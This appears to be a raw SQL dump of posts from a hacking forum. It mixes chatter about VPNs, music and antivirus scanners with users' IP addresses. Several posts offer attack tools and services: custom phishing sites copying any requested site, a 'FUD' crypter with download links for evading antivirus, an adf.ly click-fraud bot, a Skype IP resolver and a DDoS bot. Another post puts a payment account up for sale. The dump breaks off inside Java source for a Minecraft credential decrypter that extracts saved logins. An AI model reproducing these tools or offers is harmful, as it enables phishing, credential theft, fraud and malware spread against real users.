more than enough for surfing on websites, chatting and email. The paid service is also affordable.\r\n\r\n[b]6. TorVPN[/b]\r\n\r\n\r\nTorVPN is one of the latest entrants into the VPN market. TorVPN is great for bypassing strict content filters, browsing the web anonymously, securing your VOIP communications or remote access to your home/office workstation. With TorVPN you can get an OpenVPN server, SSH access, PPTP & TOR proxy. Free vpn access is restricted to 1GB per month and works on Windows, Mac, iPhone & iPad.\r\n\r\n[b]7. SecurityKiss[/b]\r\n\r\n\r\nSecurityKiss is a tunnel service which ensures security and privacy once your data leaves your computer. It redirects all your traffic through an impenetrable tunnel to our security gateway. Everything in the tunnel is encrypted.\r\n\r\n[b]8. Your-Freedom[/b]\r\n\r\n\r\nYour-Freedom makes accessible what is unaccessible to you, and it hides your network address from those who don’t need to know. The free service lets you use it for 6 hours a day (up to 15 hours a week). You can either download their software or use the OpenVPN mode. Windows, Mac & Linux platforms are supported.\r\n\r\n[b]9. USA IP[/b]\r\n\r\n\r\nFor free user, you don’t need to register, just download the USAIP.pbk file, and then double-click on the file and select one of the USAIP PPTP connections. After that, you can access the USA IP free VPN services with the username demo and the password demo. But you will need to reconnect the USA IP network after \r\n\r\n[b]10. ProXPN[/b]\r\n\r\n\r\nA free VPN service designed for use with Windows and Mac computers. ProXPN works by downloading a small free application from which to connect. The service is also compatible with the iPhone and other mobile phones that support VPN.\r\nInterestingly you can use the iPhone setup instructions to make a connection from your PC, useful if you’re a Linux user.', '41.174.54.85', '699283029', '0', '0', '0', '0', '1', '5635a188b872a67b50c83fab22226a49', '0', '0'); INSERT INTO mybb_posts VALUES('306', '104', '251', '33', 'RE: Photoshop vs Gimp', '0', '62', 'R?????zo?', '1345065247', 'Photoshop is alot more polished, stable and has the most options.\r\n\r\nGIMP is free, and has nearly the same.', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', 'c243483352f27b99cdc87670e7ed38c1', '0', '0'); INSERT INTO mybb_posts VALUES('307', '38', '98', '16', 'RE: [tut] How to lie like a pro', '0', '7', 'Romdu62', '1345065323', 'This is some good ass tutorial.', '41.174.54.85', '699283029', '0', '0', '0', '0', '1', 'e1a7203bac0fa6644e1f857a44044fda', '0', '0'); INSERT INTO mybb_posts VALUES('308', '96', '229', '30', 'RE: FBI Tools [11 in 1]', '0', '62', 'R?????zo?', '1345065354', 'will have a look. thanks for this', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '02f6724b62726a845abc30531b1a36b9', '0', '0'); INSERT INTO mybb_posts VALUES('309', '111', '281', '29', 'RE: MyFreeCams Model Registeration', '0', '1', 't3h jok3r', '1345067423', '[quote=\'Apathy\' pid=\'281\' dateline=\'1344999265\']\r\nI thought you ha said that this I private?\r\n[/quote]\r\n\r\nI sure did, but I decided to release it on my website.', '41.174.16.29', '699273245', '1', '0', '0', '0', '1', '73a146a5ea493c76c64f0499fdbae782', '0', '0'); INSERT INTO mybb_posts VALUES('310', '105', '256', '11', 'RE: DDos', '0', '48', 'BurnsH4X', '1345068543', 'how would i know if it is under cloudflare protection?', '78.133.53.116', '1317352820', '0', '0', '0', '0', '1', '52d149cdadd5c4a7b1748f28c87bddc5', '0', '0'); INSERT INTO mybb_posts VALUES('311', '105', '256', '11', 'RE: DDos', '0', '1', 't3h jok3r', '1345072575', 'To find out if a website is using cloudflare protection, you have to find our what their sites nameservers are.\n\nIf the nameservers contain SOMETHING.cloudflare.com then the site is under cloudflare protection.', '41.151.174.169', '697806505', '1', '0', '0', '0', '1', 'a80c0735b0ad92a41414b9d5539ba2d8', '0', '0'); INSERT INTO mybb_posts VALUES('312', '124', '0', '2', 'Line break mycode', '0', '1', 't3h jok3r', '1345073427', 'Testing the line break below\r\n\r\n<br>\r\n\r\nDid it work?', '41.151.174.169', '697806505', '1', '0', '1', '1345132983', '1', '2c59585ebc4a9c7cf4ee77568afc8380', '0', '1345132983'); INSERT INTO mybb_posts VALUES('313', '125', '0', '29', '[ebook]How to talk to a Police Officer when in trouble[Whitehat]', '0', '1', 't3h jok3r', '1345075280', 'This is a 2 pages ebook on how to talk to a Police Officer when you are in trouble. This is a clean method. \r\n\r\n[b]Contents[/b]\r\n[list]\r\n[*]About to get a Ticket\r\n[*]Police Investigation on your property\r\n[*]Police Investigation out of your area. EX: Work or on streets\r\n[*]Search\r\n[*]Search on Computer\r\n[*]Disputing a ticket\r\n[/list]\r\n\r\nDownload: \r\n\r\nhttp://www.mediafire.com/?9qj8hi5sz67iqlu', '41.151.174.169', '697806505', '1', '0', '0', '0', '1', '5c4cd008f032f9e60163499543d16b91', '0', '0'); INSERT INTO mybb_posts VALUES('314', '124', '312', '2', 'RE: Line break mycode', '0', '2', 'Apathy', '1345085966', 'Looks lik it did not no.', '70.53.236.250', '1177939194', '0', '0', '0', '0', '1', '62d693070735e1daf862e27dc1c5dfa1', '0', '0'); INSERT INTO mybb_posts VALUES('315', '126', '0', '15', 'Adf.ly Bot', '0', '53', 'sirchamp', '1345107167', 'Adf.ly Auto Clicker.\n[img]http://i46.tinypic.com/301lq3r.jpg[/img]\n[img]http://i46.tinypic.com/2e3x1ex.jpg[/img]\n[color=#000080]How to use:[/color][color=#FFFFFF]\nStart the .exe Then press right click and choose \"Add links\". You can add as many links as you want. Then press \"Enable Proxy\" and add your proxie list. Now press right click again and choose \"Start\"\n\n[/color][color=#000080]Features:\n[/color][color=#FFFFFF]Boost your adf.ly clicks.\n\n[/color][color=#000080]Virus scan:[/color][color=#FFFFFF]\nhttps://www.virustotal.com/file/d71bcb11d1d310e589e1cd0f286e73953dce3f55ec0834aaa1146100728ad1e1/analysis/\n\n[lock][/color][color=#000080]Download link:\n[/color][color=#FFFFFF]http://adf.ly/BwHQr\n[/lock]\n\n[/color][color=#000080]Password:\n[/color][color=#FFFFFF]champ\n\n[/color]', '188.155.56.90', '-1130678182', '1', '0', '1', '1352011072', '1', '2414a6f99661f868c8972afb2c0fc09c', '0', '1352011072'); INSERT INTO mybb_posts VALUES('316', '127', '0', '46', 'Will make you a phisher website with theme you request.', '0', '64', 'vlajke', '1345111892', 'Hello fellow members, i feel generous today and I will make a phisher website template fully functional for first 5 members who post below me. You just have to pick website you want to be copied and give me your email address. That\'s pretty much it, i will not create you a new website, i will just copy existing one you provide. \r\n\r\n>:)\r\n\r\nCheers!', '178.223.56.85', '-1293993899', '0', '0', '0', '0', '1', '436d3b02ce5a3e9a6ed02f3bc0bcb267', '0', '0'); INSERT INTO mybb_posts VALUES('317', '127', '316', '46', 'RE: Will make you a phisher website with theme you request.', '0', '53', 'sirchamp', '1345112703', 'Can i have a website? Thanks', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '6ac06f8caf6e0de468f2729d47ed8ea6', '0', '0'); INSERT INTO mybb_posts VALUES('318', '127', '317', '46', 'RE: Will make you a phisher website with theme you request.', '0', '64', 'vlajke', '1345113124', '[quote=\'sirchamp\' pid=\'317\' dateline=\'1345112703\']\r\nCan i have a website? Thanks\r\n[/quote]\r\n\r\n\r\n\r\nPlease correct the following errors before continuing:\r\n\r\n sirchamp has private messaging disabled. You cannot send private messages to this user.', '178.223.56.85', '-1293993899', '0', '0', '0', '0', '1', 'bea729272062dd2390150a1a78f9d37b', '0', '0'); INSERT INTO mybb_posts VALUES('319', '127', '316', '46', 'RE: Will make you a phisher website with theme you request.', '0', '53', 'sirchamp', '1345113267', 'Oh yeah^^. i corrected it.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', 'd3906642eba75bda98a9b98b5e362b81', '0', '0'); INSERT INTO mybb_posts VALUES('320', '128', '0', '19', '[Junk]MoneyBookers acc with ~100$ on it.', '0', '64', 'vlajke', '1345116640', 'Hello guys, i\'d like to sell a moneybooker account, verified with CC that has 90$ on it. Kindly offer me a decent price, i can take payza, moneybookers or western union as payment option. Cheers', '178.223.56.85', '-1293993899', '0', '0', '0', '0', '1', '6199a3d3b9c781f4c793afce1f7d6055', '0', '0'); INSERT INTO mybb_posts VALUES('321', '124', '312', '2', 'RE: Line break mycode', '0', '1', 't3h jok3r', '1345133049', 'Because, I deleted the mycode.', '41.174.8.31', '699271199', '1', '0', '0', '0', '1', 'a03ff3397fcfd3e99d73ab86b72bb995', '0', '0'); INSERT INTO mybb_posts VALUES('323', '14', '39', '8', 'RE: Work Hard Play Hard-Rap', '0', '50', 'sana khan', '1345135064', 'i heard it first time bt like the song. thumbs up :)', '182.177.125.164', '-1229881948', '0', '0', '0', '0', '1', '44165932908fd3df22ce37cefafb2ed7', '0', '0'); INSERT INTO mybb_posts VALUES('324', '129', '0', '8', 'ss501 because i\'m stupid(korean)', '0', '50', 'sana khan', '1345135217', 'one of my favourite song....\r\n[video=youtube]http://www.youtube.com/watch?v=feEUgiIABbk[/video]', '182.177.125.164', '-1229881948', '0', '0', '50', '1345135313', '1', '5b392c7561f664d584ad4ce1d410381d', '0', '1345135313'); INSERT INTO mybb_posts VALUES('325', '130', '0', '15', 'Skype IP Finder - FREE', '0', '67', 'HoverCatz', '1345135783', 'Hey everyone.\r\nI made a quick program in VB.Net. It gets some information (Ip, etc) from a Skype username.\r\nI only take credits for the design (Not the theme), and putting the thing together.\r\n\r\nScreenshot:\r\n[img]http://gyazo.com/b3ac17c439fd16c45f558cac89cb7a44.png[/img]\r\n\r\nDownload: [url=https://dl.dropbox.com/u/33062220/Skype%20IP%20Finder.exe]Click here[/url]\r\nVirustotal: [url=https://www.virustotal.com/file/8c60f92332a276a1ec325c9ff549fa363895efaf3d76eabff6b4ad188fd9088f/analysis/1345135727/]Click here[/url]\r\n\r\n[color=#FF0000]The API is down for the Skype IP Finder. This program no longer works.[/color] - LH staff, thanks to OP for the heads up.', '85.165.36.95', '1436886111', '1', '0', '1', '1345756859', '1', '4c1ff623fc61701fcff38d470a6f453f', '0', '1345756859'); INSERT INTO mybb_posts VALUES('326', '99', '237', '3', 'RE: [Previews added]New theme for LH', '0', '53', 'sirchamp', '1345141006', 'Looks nice even tough the green color makes it look like l33thackers forum.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '16cd83b1f8a2b948c2718896b70df7f0', '0', '0'); INSERT INTO mybb_posts VALUES('327', '60', '146', '25', 'RE: [guide] Basic Computer Security', '0', '53', 'sirchamp', '1345141325', 'Microsoft Security Essentials is also a good free antivirus.', '188.155.56.90', '-1130678182', '1', '0', '0', '0', '1', '826733928ae5d671bd5a1c16035e376c', '0', '0'); INSERT INTO mybb_posts VALUES('328', '99', '326', '3', 'RE: [Previews added]New theme for LH', '0', '1', 't3h jok3r', '1345141726', '[quote=\'sirchamp\' pid=\'326\' dateline=\'1345141006\']\r\nLooks nice even tough the green color makes it look like l33thackers forum.\r\n[/quote]\r\n\r\n\r\nYour right. The theme is the same theme, but it\'s a free theme. I have added the theme a lot and made several changes. L33THackers is mostly down in my opinion so I don\'t think it should be any problems.', '41.174.5.68', '699270468', '1', '0', '0', '0', '1', 'ddf77506815a7328e33840e3c29bc123', '0', '0'); INSERT INTO mybb_posts VALUES('329', '128', '320', '19', '[Junk]MoneyBookers acc with ~100$ on it.', '0', '1', 't3h jok3r', '1345142810', 'This thread has been junked.', '41.174.5.68', '699270468', '1', '0', '0', '0', '1', '', '0', '0'); INSERT INTO mybb_posts VALUES('330', '120', '301', '4', 'RE: reloadz0r is here', '0', '9', 'p420', '1345143198', 'Welcome to LH. I agree, it\'s nice to have an idea of everything.', '41.174.5.68', '699270468', '0', '0', '0', '0', '1', '5605dc936f7492681b3561c1bbf74f2c', '0', '0'); INSERT INTO mybb_posts VALUES('331', '14', '39', '8', 'RE: Work Hard Play Hard-Rap', '0', '9', 'p420', '1345143271', 'I like the song too, even tough I\'m not into rap that much.', '41.174.5.68', '699270468', '0', '0', '0', '0', '1', '93e6752f12910efdbc0906ac3d37b15d', '0', '0'); INSERT INTO mybb_posts VALUES('332', '129', '324', '8', 'RE: ss501 because i\'m stupid(korean)', '0', '9', 'p420', '1345143328', 'I\'m not being racist, just curious. Are you Korean?', '41.174.5.68', '699270468', '0', '0', '0', '0', '1', '6c3fe0189414f0bb1ea7fcab12b062f4', '0', '0'); INSERT INTO mybb_posts VALUES('333', '107', '261', '12', 'RE: how to change the icon of an exe file using resource hacker', '0', '9', 'p420', '1345143902', 'Well-detailed tutorial.\n\nThanks, but next time please concentrate at your grammar.', '41.174.5.68', '699270468', '0', '0', '0', '0', '1', 'f97f99113bf8f2fea504f09833fbead7', '0', '0'); INSERT INTO mybb_posts VALUES('334', '103', '249', '12', 'RE: [Tutorial] Stealing Cookies With XSS', '0', '9', 'p420', '1345143986', 'You clearly copied and pasted it. You could\'ve atleast added the proper codes. Anyways, nice thread.', '41.174.5.68', '699270468', '0', '0', '0', '0', '1', '110ec1e77c10d2cc57c37c560613aa4b', '0', '0'); INSERT INTO mybb_posts VALUES('335', '131', '0', '12', '[tut]How to change IP address within seconds.', '0', '9', 'p420', '1345144158', '[align=center][size=medium][color=#1E90FF]Want to change your IP Address quicker than ever ? without downloading anything?\r\nYou can now learn how to do that quick and hassle free ![/color][/size] [/align]\r\n\r\n\r\n[align=center][video=youtube]http://www.youtube.com/watch?v=SrWTGaYP37A[/video][/align]\r\n[/quote]', '41.174.5.68', '699270468', '0', '0', '0', '0', '1', 'c10458a50eff3e264fa88766e625593a', '0', '0'); INSERT INTO mybb_posts VALUES('336', '95', '225', '13', 'RE: XSS Cheat Sheet', '0', '12', 'jonas83', '1345144272', 'That\'s some big ass tutorial.', '41.174.5.68', '699270468', '0', '0', '0', '0', '1', '7a9a560a366080d7d953ac493932f5b4', '0', '0'); INSERT INTO mybb_posts VALUES('337', '130', '325', '15', 'RE: Skype IP Finder - FREE', '0', '12', 'jonas83', '1345144395', 'Yippee. I\'m the first downloader. Works like charm and neatly coded. \n\nNice Share.', '41.174.5.68', '699270468', '0', '0', '0', '0', '1', '058b250e8a11dd8939047cef70bf46d7', '0', '0'); INSERT INTO mybb_posts VALUES('338', '132', '0', '20', '[Forever FUD]No Dependency Crypter!', '0', '1', 't3h jok3r', '1345145205', '[align=center]Hey guyz, I just hacked a no dependency source and a friend helped me to compile it, so now I\'m sharing it with u :D.\r\n\r\nSo here\'s a scan:\r\n\r\n[i]File Info[/i]\r\n\r\nReport date: 2012-08-15 20:25:13 (GMT 1)\r\nFile name: [b]not-detected-exe[/b]\r\nFile size: 1106806 bytes\r\nMD5 Hash: 083c9e82b537c0120dbe99fc73a12786\r\nSHA1 Hash: 60789a3e8642931dad95ffded722b5ef90e6fb09\r\nDetection rate: [color=red]1[/color] on 14 ([color=red]7%[/color]) \r\nStatus: [color=red]INFECTED[/color] \r\n\r\n[i]Detections[/i]\r\n\r\nAsquared - [color=red][/color]\r\nAvast - [color=red][/color]\r\nAVG - [color=red][/color]\r\nAvira - [color=red][/color]\r\nBitDefender - [color=red][/color]\r\nClamAV - [color=red][/color]\r\nComodo - [color=red][/color]\r\nDrWeb - [color=red][/color]\r\nFprot - [color=red][/color]\r\nIkarusT3 - [color=red][/color]\r\nPanda - [color=red][/color]\r\nSTOPZilla - [color=red]Trojan.Win32.Mal.Gen.36092[/color]\r\nTrendMicro - [color=red][/color]\r\nVBA32 - [color=red][/color]\r\n\r\n[i]Scan report generated by\r\n[url=http://novirusthanks.org]NoVirusThanks.org[/url][/i]\r\nhttp://vscan.novirusthanks.org/analysis/083c9e82b537c0120dbe99fc73a12786/bm90LWRldGVjdGVkLWV4ZQ==/\r\n\r\nYou can get it fud if you insert a really complicated key, so if you get a good one u will get it FUD for long time.\r\n\r\n\r\nHere\'s an img with the crypter:\r\n\r\n[img]http://uploadimage.ro/images/66074166845554104963.png[/img][/align]\r\n\r\nDownload link:\r\n\r\n[align=center][url=http://fileice.net/download.php?file=3ew6o][img]http://img833.imageshack.us/img833/319/coollogocom241633070.png[/img][/url][/align]\r\n\r\nOR\r\n\r\nhttp://stereo-engineer.info/File.html', '41.174.5.68', '699270468', '1', '0', '0', '0', '1', '8b6dfe4f42f4441b0c1e3717de1bb387', '0', '0'); INSERT INTO mybb_posts VALUES('339', '133', '0', '23', 'Online Scanners list', '0', '19', 'yazz', '1345145459', '[align=center][size=xx-large][color=#9370DB]Online Anti-Malware (File) Scanners[/color][/size]\r\n\r\n[color=#A9A9A9]This is a list of online scanners that will check uploaded files for malware using antivirus engines. You can use these scanners to determine if a file is safe or malicious without putting your system at risk.\r\n\r\n[color=#00BFFF][align=center][size=x-large]Multiple Antivirus Engines[/color][/size][/align][/color]\r\n\r\n[align=center][url=http://www.virustotal.com/][IMG]http://i.imgur.com/9LrYm.jpg[/IMG][/url][/align]\r\nVirustotal uses 40 AV engines. This service has an excellent detection rate. It gives detailed results from each AV engine and provides real time global statistics. Note: VirusTotal also has an uploader program (140KB) that will automatically sends files to VirusTotal without you opening your web browser. 20 MB file size limit.\r\n\r\n[align=center][url=http://virusscan.jotti.org][IMG]http://i.imgur.com/h4QVi.png[/IMG][/url][/align]\r\nit uses 20 AV engines. 20 MB file size limit.it is a free online service that enables you to scan suspicious files with several anti-virus programs.\r\n\r\n[url=http://virscan.org/] [IMG]http://i.imgur.com/yVkUE.gif[/IMG][/url]\r\nit uses 37 AV engines. 20 MB file size limit.\r\n\r\n[align=center][url=http://vscan.novirusthanks.org/] [IMG]http://i.imgur.com/hsnyb.jpg[/IMG][/url] [/align]\r\nNovirusthanks uses 5 AV engines. 20 MB file size limit. Note: NoVirusThanks also has an uploader program.\r\n\r\n[align=center][url=http://www.viruschief.com/] [IMG]http://i.imgur.com/q326R.png[/IMG][/url][/align]\r\n13 AV engines. 10 MB file size limit. VirusChief offers a free service for online virus scan suspicious files (which *could* contain a computer virus) using several antivirus online virus scan engines.\r\n\r\n[align=center][url=http://www.filterbit.com/] [IMG]http://i.imgur.com/fFpdT.jpg[/IMG][/url][/align]\r\n10 AV engines. 20 MB file size limit.\r\nFilterbit is another VirSCAN similar service that lets you scan files online in search of Trojans or any other kind of malware using multiple antirivus in the analysis.\r\n\r\n[align=center][url=http://bugbopper.com/SubmitAFile.asp] [IMG]http://i.imgur.com/F5EEJ.png[/IMG][/url][/align]\r\n8 AV engines.\r\n\r\n[align=center][url=http://www.garyshood.com/virus/]\r\n Gary\'s Hood[/url]\r\nit uses 5 AV engines. 10 MB file size limit.\r\n\r\n[url=http://www.allthreats.com/index.pl]\r\nAllthreats[/url][/align]\r\nuses 3 AV engines. 10 MB file size limit.\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n[hr]\r\n[size=xx-large][color=#00BFFF][align=center]Single Antivirus Engine[/align][/color][/size]\r\n\r\n[align=center][url=http://onlinescan.avast.com/][IMG]http://i.imgur.com/lhZZj.png[/IMG][/url][/align]\r\n Avast! online virus scanner gives the possibility to check your files quickly and free of charge. 16 MB file size limit. \r\n\r\n[align=center][url=http://vms.drweb.com/online/][IMG]http://i.imgur.com/WqJS5.png[/IMG][/url][/align]\r\nYour files will be checked by the latest version of the Dr.Web Antivirus.\r\n\r\n[align=center][url=http://www.kaspersky.com/scanforvirus][IMG]http://i.imgur.com/50HAv.png[/IMG][/url][/align]\r\nThe Kaspersky Online Virus Scanner scans your computer for malicious code and offers the same exceptional detection rates as other Kaspersky Lab products. 1 MB file size limit.\r\n\r\n[align=center][url=http://www.fortiguard.com/antivirus/virus_scanner.html][IMG]http://i.imgur.com/qhh8a.png[/IMG][/url][/align]\r\nYour files will be scanned using FortiClient AV engine. 1 MB file size limit.\r\n\r\n[align=center][url=http://www.arcabit.com/check_files][IMG]http://i.imgur.com/MpS5x.gif[/IMG][/url][/align]\r\nUses the ArcaVir AV engine.\r\n\r\n[align=center][url=http://www.pandasecurity.com/homeusers/solutions/activescan/][IMG]http://i.imgur.com/PpXpn.png[/IMG][/url][/align]\r\nPanda ActiveScan is an advanced online scanner based on Collective Intelligence (scanning in the cloud) that detects malware that traditional security solutions cannot detect.\r\n[align=center]\r\n[url=http://housecall.trendmicro.com/][IMG]http://i.imgur.com/aBZ90.png[/IMG][/url][/align]\r\nTrend Micro HouseCall™ is an online application that scans, detects and cleans your computer of possible infection by viruses, spyware, or other malware.\r\n\r\n[align=center][url=http://security.symantec.com/sscv6/home.asp?langid=ie&venid=sym&plfid=23&pkj=GHHRPWFYJOKMFIDPMSV][IMG]http://i.imgur.com/Pyb2D.png[/IMG][/url][/align]\r\nSymantec Security Check tests your computer’s exposure to a wide range of online threats. It’s free and an effective tool that helps determine your Internet security needs.\r\n\r\n[align=center]\r\n[url=http://www.eset.com/onlinescan/][IMG]http://i.imgur.com/7JJVs.png[/IMG][/url][/align]\r\nESET Online Scanner is a user friendly, free and powerful tool which you can use to remove malware from any PC utilizing only your web browser without having to install anti-virus software.\r\n\r\n[align=center][url=http://www.f-secure.com/en_EMEA/security/security-lab/tools-and-services/online-scanner/][IMG]http://i.imgur.com/MZhDQ.png[/IMG][/url][/align]\r\n\r\nF-Secure Online Scanner can help get rid of viruses and spyware causing problems on your PC.\r\n\r\n[align=center][url=http://www.bitdefender.com/scanner/online/free.html][IMG]http://i.imgur.com/o13RA.png[/IMG][/url][/align]\r\nBitDefender Online Scanner is an on-demand antivirus and antispyware tool that shows how safe your PC is.\r\n\r\n[align=center][url=http://home.mcafee.com/Downloads/FreeScan.aspx][IMG]http://i.imgur.com/yyDQz.png[/IMG][/url][/align]\r\nMcAfee FreeScan helps you detect thousands of viruses on your computer. FreeScan searches for viruses, including the latest known “in the wild” viruses, and displays a detailed list of any infected files.\r\n\r\n[align=center][url=http://cainternetsecurity.net/entscanner/][IMG]http://i.imgur.com/blG8w.png[/IMG][/url][/align]\r\nThe CA Online Threat Scanner scans your computer for viruses and spyware and can detect malware threats from within your web browser.\r\n\r\n[url=http://onecare.live.com/site/en-US/default.htm][IMG]http://i.imgur.com/yEtLq.png[/IMG][/url]\r\nWindows Live OneCare safety scanner is a free service designed to help ensure the health of your PC.\r\n[hr]\r\n\r\n\r\n[size=x-large][align=center][color=#00BFFF]Automated Malware Analysis Services [/color][/align][/size]\r\n[align=center](Analyze file behavior)\r\nThe following services analyze your submitted files on a test (sandbox) system and then sends you a report on what it saw.[/align]\r\n\r\n[url=http://www.sunbeltsecurity.com/sandbox/]\r\n[IMG]http://i.imgur.com/XhbhQ.jpg[/IMG][/url]\r\n 12 MB file size limit. (Results by email)\r\n\r\n[url=http://anubis.iseclab.org/] [IMG]http://i.imgur.com/n3qRe.png[/IMG][/url]\r\n8 MB file size limit. The file must be a Windows executable.\r\n\r\n[url=http://wepawet.iseclab.org/] [IMG]http://i.imgur.com/HwnDe.png[/IMG][/url]\r\nit detects and analyzes web-based malware. It currently handles Flash, JavaScript and PDF files.\r\n\r\n[url=http://www.threatexpert.com/submit.aspx][IMG]http://i.imgur.com/fm3yg.jpg[/IMG][/url]\r\n5 MB file size limit. (Results by email) Note: ThreatExpert also has a uploader program (944KB). \r\n\r\n[align=center][url=https://vms.drweb.com/sendvirus/][img]http://i.imgur.com/WqJS5.png[/img][/url][/align]\r\nResults by email.\r\n\r\n[url=http://camas.comodo.com/] [IMG]http://i.imgur.com/rtIJY.png[/IMG][/url]\r\nComodo Instant Malware Analysis\r\n\r\n[url=http://valkyrie.comodo.com/] [IMG]http://i.imgur.com/rtIJY.png[/IMG][/url]\r\nComodo File Verdict Service (Valkyrie)\r\n20 MB file size limit. \r\n\r\n[url=http://www.norman.com/security_center/security_tools/] [IMG]http://i.imgur.com/YiDCF.gif[/IMG][/url]\r\n Norman Sandbox , results by email.\r\n\r\n[align=center][url=http://www.joesecurity.org/service.php] Joe Sandbox[/url][/align]\r\n 12 MB file size limit. Registration required. (Results by email)\r\n\r\n[align=center][url=http://www.xandora.net/upload/] Xandora[/url][/align]\r\n10 MB file size limit (15 to 30 minutes processing time).\r\n\r\n[align=center][url=https://www.vicheck.ca/]viCheck.ca[/url][/align]\r\nDecrypts and extracts malicious executables from common document formats. 10 MB file size limit. (Results by email)\r\n\r\nSource:\r\n[code]http://realsecurity.web.officelive.com/filescanners.aspx\r\nhttp://whatsonmypc.wordpress.com/2009/08/30/onlinescan/[/code]\r\n[/align]', '41.174.5.68', '699270468', '0', '0', '0', '0', '1', '1c6333b6cd5345599e3ffb8f720f1cb7', '0', '0'); INSERT INTO mybb_posts VALUES('340', '120', '301', '4', 'RE: reloadz0r is here', '0', '1', 't3h jok3r', '1345151031', 'Welcome to L33T Hacking.\n\nHope you enjoy your stay.', '41.174.53.130', '699282818', '1', '0', '0', '0', '1', '957d8909edbf136d5f20705d3742109a', '0', '0'); INSERT INTO mybb_posts VALUES('341', '134', '0', '47', 'Win $10 for referring people', '0', '1', 't3h jok3r', '1345151263', 'Win $10 via PayPal for referring 5 HQ and active people. \r\n\r\nWe recommend you to use the refer a member or quick referral link which both can be accessed in your UCP. \r\n\r\nContest ends>Till the first winner is crowned.', '41.174.53.130', '699282818', '1', '0', '0', '0', '1', '01abda5fbc292d81a748ea9d98cd012c', '0', '0'); INSERT INTO mybb_posts VALUES('342', '112', '283', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '62', 'R?????zo?', '1345153919', 'I\'d love this, could you PM me. Thanks', '94.132.244.168', '1585771688', '1', '0', '0', '0', '1', '179ffcb93370ccec818c8d6e8d84afed', '0', '0'); INSERT INTO mybb_posts VALUES('343', '16', '42', '11', 'RE: Is Hacking legal or illegal?', '0', '60', 'Linux', '1345178009', 'Hacking is illegal and it\'s a kinda art.', '117.206.89.155', '1976457627', '0', '0', '0', '0', '1', '59c4090b5db7b5e1425bfea138dda33e', '0', '0'); INSERT INTO mybb_posts VALUES('344', '49', '126', '21', 'RE: Pandora DDOS Bot [Direct Link]', '0', '61', 'NXK', '1345180204', 'Hey, I\'m interested in this, What kind of ddos commands does it have?', '99.253.65.17', '1677541649', '0', '0', '0', '0', '1', '56d521d328575a49d0d173c503ad70e9', '0', '0'); INSERT INTO mybb_posts VALUES('345', '135', '0', '43', 'Astro Pid [free4all] mediafire', '0', '61', 'NXK', '1345180664', '[img]http://2.bp.blogspot.com/-PIPwZrN7sQo/T51nqnC0xLI/AAAAAAAAAkM/Xz7KenOuh8o/s1600/AstroPID+3.jpg[/img]I have a clean astro pid for everyone, Iv used it myself and can say it\'s awesome.\r\n\r\ndl\r\nhttp://adf.ly/BxxUh', '99.253.65.17', '1677541649', '0', '0', '61', '1345180697', '1', '218f3bf2c016f2181d1142d9a97924ee', '0', '1345180697'); INSERT INTO mybb_posts VALUES('346', '134', '341', '47', 'RE: Win $10 for referring people', '0', '54', 'Sin Cara', '1345181744', 'nice contest!!! will bring HQ members :)', '119.154.22.176', '2006587056', '1', '0', '0', '0', '1', '1afcc11f807a83e9430793db7c2b9d10', '0', '0'); INSERT INTO mybb_posts VALUES('347', '99', '237', '3', 'RE: [Previews added]New theme for LH', '0', '54', 'Sin Cara', '1345181947', 'The theme looks really cool now:)', '119.154.22.176', '2006587056', '1', '0', '0', '0', '1', 'b1f849b2515b809a9ddc647003d0d813', '0', '0'); INSERT INTO mybb_posts VALUES('348', '43', '105', '7', 'RE: How did you find us?', '0', '54', 'Sin Cara', '1345182093', 'I m here because of t3h jok3r. lol :)', '119.154.22.176', '2006587056', '1', '0', '0', '0', '1', 'b4d11e20be055762da1d472e070f4663', '0', '0'); INSERT INTO mybb_posts VALUES('349', '112', '342', '19', 'RE: ??? Ultimate Premium PPD Ebooks Give away ???', '0', '54', 'Sin Cara', '1345182864', '[quote=\'R?????zo?\' pid=\'342\' dateline=\'1345153919\']\r\nI\'d love this, could you PM me. Thanks\r\n[/quote]\r\n\r\nPPD ebooks pack is sent... check your pm now. :)\n[hr]\n[quote=\'Triple H\' pid=\'299\' dateline=\'1345062928\']\r\nI would like a download link. Thanks, but is this [censored] or file ice?\r\n[/quote]\r\n\r\n\r\nPPD ebooks pack is sent... check your pm now. :)', '119.154.22.176', '2006587056', '1', '0', '54', '1345182889', '1', '6124b79cc8c5a6ddf3bf3dc53134d24e', '0', '1345182889'); INSERT INTO mybb_posts VALUES('350', '120', '301', '4', 'RE: reloadz0r is here', '0', '54', 'Sin Cara', '1345183453', 'Welcome to LH...\r\nStay active, be HQ and read rules :)', '119.154.22.176', '2006587056', '1', '0', '54', '1345218816', '1', '4c4009383a7650ddf0ecb31dc2a0c3fc', '0', '1345218816'); INSERT INTO mybb_posts VALUES('351', '108', '262', '4', 'RE: Hey all', '0', '54', 'Sin Cara', '1345183500', 'Welcome to LH!\r\nStay active, be HQ and read rules :)', '119.154.22.176', '2006587056', '1', '0', '54', '1345218864', '1', '71b958768ffc7d07c75c946c3ffcfa64', '0', '1345218864'); INSERT INTO mybb_posts VALUES('352', '115', '290', '48', 'RE: [tut] How to Moderate LH as a MOD', '0', '54', 'Sin Cara', '1345183570', 'Thanks for this guide....\n\nI will try my best to do my job :)', '119.154.22.176', '2006587056', '1', '0', '0', '0', '1', '1dc4d0f7967090edc0a8c66d6e056f00', '0', '0'); INSERT INTO mybb_posts VALUES('353', '136', '0', '53', '[Java] Minecraft Lastlogin Decrypter [Source]', '0', '54', 'Sin Cara', '1345183757', '[color=#FF0000][b]Credits to me for sharing and credits to kamito as he is original author.[/b][/color]\r\n\r\n[code]import java****.*;\r\nimport javax.crypto.*;\r\nimport java.util.*;\r\nimport javax.crypto.spec.*;\r\n\r\npublic class test\r\n{\r\n\r\n\r\npublic static void main(String[] args)\r\n{\r\nnew test();\r\n}\r\npublic String user = \"\";\r\npublic String pass = \"\";\r\n\r\npublic test()\r\n{\r\nreadUsername();\r\nSystem.out.println(user+\" \"+pass);\r\n}\r\n\r\n\r\n private void readUsername() {\r\n try {\r\n //File lastLogin = new File(Util.getWorkingDirectory(), \"lastlogin\");\r\nFile lastLogin = new File(\"./lastlogin\");\r\n Cipher cipher = getCipher(2, \"passwordfile\");\r\n DataInputStream dis;\r\n if (cipher != null)\r\n dis = new 